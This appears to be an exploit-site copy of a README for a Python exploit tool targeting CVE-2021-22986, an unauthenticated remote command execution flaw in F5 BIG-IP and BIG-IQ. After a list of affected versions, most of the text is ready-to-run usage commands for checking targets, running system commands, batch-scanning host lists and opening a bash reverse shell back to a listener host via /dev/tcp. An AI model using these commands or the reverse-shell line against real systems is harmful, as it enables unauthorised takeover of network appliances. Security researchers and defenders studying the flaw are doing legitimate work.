Exploit for Server-Side Request Forgery in F5 Big-Ip Access Policy Manager CVE-2021-22986

## https://sploitus.com/exploit?id=7209646A-510D-5B41-BE5F-315ADD499456
## CVE-2021-22986

This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.

### Vuln Product

F5 BIG-IQ 6.0.0-6.1.0
F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IP 13.1.0-13.1.3.5
F5 BIG-IP 14.1.0-14.1.3.1
F5 BIG-IP 15.1.0-15.1.2
F5 BIG-IP 16.0.0-16.0.1


### Usage

```
python3 CVE_2021_22986.py
```

### Finding Vulnerability
```
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
```

### Command Execution
```
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
```

### Executing Command with whoami
```
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
```

### Batch Scan
```
python3 CVE_2021_22986.py -s true -f check.txt
```

### Reverse Shell
```
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
```

### New PoC
```
python3 newpoc.py https://192.168.174.164
```

### References:-

* https://support.f5.com/csp/article/K03009991

* https://github.com/safesword/F5_RCE

* https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

* https://github.com/Udyz/CVE-2021-22986-SSRF2RCE